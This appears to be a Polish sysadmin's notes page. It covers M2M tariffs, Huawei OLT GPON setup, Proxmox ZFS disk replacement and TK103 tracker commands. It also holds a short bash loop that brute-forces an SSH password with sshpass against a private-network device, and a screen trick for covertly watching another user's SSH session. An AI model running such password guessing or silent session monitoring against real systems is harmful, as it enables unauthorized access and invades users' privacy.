Jak wyłączyć RCBALERT?

Standardowo nie ma możliwości wyłączenia otrzymywania powiadomień z RCBALERT. Ale jest na to metoda. Operatorzy komórkowi mają specjalne taryfy przeznaczone dla urządzeń (M2M), a nie do rozmawiania. Wystarczy zmienić taryfę na taką i nie otrzyma się więcej powiadomienia RCBALERT.

W Play taryfa ta nazywa się M2M i kosztuje od 4,50zł miesięcznie.

W Plus taryfa telemetryczna też nazywa się M2M i jej koszt to od 3zł miesięcznie.

Minusem taryf telemetrycznych jest brak wliczonych minut rozmów w abonament.

Brute force ssh login

apt-get install sshpass

Hasło zawierało 2 cyfry z shiftem oraz 4 stałe znaki

#!/bin/bash
TAB=("!" "@" "#" "$" "%" "^" "&" "*" "(" ")");
for (( i=0; $i <= 9; i++ )) ; do
for (( j=0; $j <= 9; j++ )) ; do
   PSS=${TAB[$i]}${TAB[$j]}"xxxx";
   echo $PSS;
sshpass -p "$PSS" ssh ubnt@10.10.197.77 
done
done

Konfiguracja OLT Huawei dla OSE

vlan 5 smart
port vlan 5 0/9 0
vlan attrib 5 q-in-q
interface giu 0/9
jumbo-frame 0 enable

GAMS(config)#vlan service-profile profile-id 22 profile-name MDO

GAMS(config-vlan-srvprof-22)#forwarding vlan-connect
Info: Please use the commit command to make modifications take effect

GAMS(config-vlan-srvprof-22)#bpdu tunnel enable
Info: Please use the commit command to make modifications take effect

GAMS(config-vlan-srvprof-22)#commit

GAMS(config)#vlan bind service-profile 5 profile-id 22
Binding will last for several minutes, please do not delete the VLAN.

GAMS(config)#ont-srvprofile gpon profile-id 22 profile-name MdO-szkola

GAMS(config-gpon-srvprofile-22)#ont-port pots adaptive eth adaptive
{ |catv|moca|tdm-srvtype|tdm-type|tdm|vdsl }:

Command:
ont-port pots adaptive eth adaptive

GAMS(config-gpon-srvprofile-22)#port vlan eth 1 transparent
Set ONT port(s) VLAN configuration, success: 1, failed: 0

GAMS(config-gpon-srvprofile-22)#commit

GAMS(config-gpon-srvprofile-22)#quit

GAMS(config)#ont-lineprofile gpon profile-id 22 profile-name MdO-szkola

GAMS(config-gpon-lineprofile-22)#tcont 1 dba-profile-id 10

GAMS(config-gpon-lineprofile-22)#mapping-mode port

GAMS(config-gpon-lineprofile-22)#gem add 1 eth tcont 1
{ |cascade|downstream-priority-queue|encrypt|gem-car|priority-queue }:

Command:
gem add 1 eth tcont 1

GAMS(config-gpon-lineprofile-22)#gem mapping 1 0 eth 1
{ |flow-car|priority|transparent|vlan }:

Command:
gem mapping 1 0 eth 1

GAMS(config-gpon-lineprofile-22)#commit

ont add 10 22 sn-auth 48575443A1xxxxxx omci ont-lineprofile-id 22 ont-srvprofile-id 22 desc MdO-Szkola25
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 10 tag-transform translate-and-add inner-vlan 800
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 11 tag-transform translate-and-add inner-vlan 801
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 12 tag-transform translate-and-add inner-vlan 802
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 51 tag-transform translate-and-add inner-vlan 803
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 52 tag-transform translate-and-add inner-vlan 804
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 101 tag-transform translate-and-add inner-vlan 805
service-port vlan 5 gpon 0/0/10 ont 22 gemport 1 multi-service user-vlan 102 tag-transform translate-and-add inner-vlan 806

Podmiana dysku zfs proxmox

# zpool list
NAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
rpool 7.27T 13.0G 7.25T – – 0% 0% 1.00x DEGRADED –
# zpool status -v
pool: rpool
state: DEGRADED
status: One or more devices are faulted in response to persistent errors.
Sufficient replicas exist for the pool to continue functioning in a
degraded state.
action: Replace the faulted device, or use ‚zpool clear’ to mark the device
repaired.
scan: scrub repaired 704K in 0 days 00:07:18 with 0 errors on Sun Mar 8 00:31:47 2020
config:

NAME                        STATE   READ WRITE CKSUM
rpool                        DEGRADED   0   0   0
 raidz1-0                     DEGRADED   0   0   0
  ata-ST2000DM001-1ER164_W4Z0E981-part3      ONLINE    0   0   0
  ata-WDC_WD20EARS-00MVWB0_WD-WCAZA3946000-part3 FAULTED  178   0   0 too many errors
  ata-ST2000DM001-9YN164_Z1E1DQEV-part3      ONLINE    0   0   0
  ata-ST2000DM001-9YN164_W24055XV-part3      ONLINE    0   0   0

Po włożeniu nowego dysku kopiujemy tablicę partycji:

sgdisk --replicate=/dev/sdb /dev/sda

(z sda do sdb)

Randomizujemy UIDy:

# sgdisk --randomize-guids /dev/sdb

#zpool replace rpool ata-WDC_WD20EARS-00MVWB0_WD-WCAZA3946000-part3 sdb3

i już:

zpool status -v

pool: rpool
state: ONLINE
scan: resilvered 2.42G in 0 days 00:01:58 with 0 errors on Wed Mar 18 16:09:50 2020
config:

NAME                    STATE   READ WRITE CKSUM
rpool                   ONLINE    0   0   0
 raidz1-0                 ONLINE    0   0   0
  ata-ST2000DM001-1ER164_W4Z0E981-part3 ONLINE    0   0   0
  sdb3                  ONLINE    0   0   0
  ata-ST2000DM001-9YN164_Z1E1DQEV-part3 ONLINE    0   0   0
  ata-ST2000DM001-9YN164_W24055XV-part3 ONLINE    0   0   0

errors: No known data errors

Jeśli nie da się z jakiegoś powodu zrobić replace (np. busy), można zrobić zpool detach (usunięcie) i zpool attach (dodanie jako mirror).

Na koniec jeszcze (dopiero gdy zakończy się synchronizacja i dysk będzie ONLINE) :

grub-install /dev/sdb

W proxmox od 6.4:

# proxmox-boot-tool status
# proxmox-boot-tool format /dev/sda2

# proxmox-boot-tool init /dev/sda2
# proxmox-boot-tool refresh

GPS tracker tk103 konfiguracja

Aby zresetować konfigurację:

begin123456

Aby ustawić APN:

APN123456 internet

Podać adres IP i port do wysyłki:

adminip123456 176.121.1.1 5001

Aby ustawić wysyłkę co 30 sekund:

fix030s***n123456

Aby wysyłać do serwera po gprs:

gprs123456

(pas)

Podgląd co ktoś robi przez ssh – korzystając ze screena

Zakładamy, że konto ma ustawiony shell /bin/bash. Aby podczas logowania uruchamiał się screen dodajemy w pliku:

.bash_profile

zawartość:

/usr/bin/screen -l

(opcja -l aby nie pojawiał się komunikaty startowe programu screen)

Teraz po zalogowaniu na konto uruchamia się nowa sesja screena. Po zalogowaniu dwukrotnym, w jednej sesji opuszczamy screen (CTRL-A-D) i na niej listujemy jakie inne screeny są uruchomione:

screen -list
There is a screen on:
18446.pts-1.natalka (11.08.2019 11:28:06) (Attached)
1 Socket in /run/screen/S-fib.

Do takiego screena możemy się podłączyć przez:

screen -x 18446

(jeśli jest tylko jeden to wystarczy screen -x)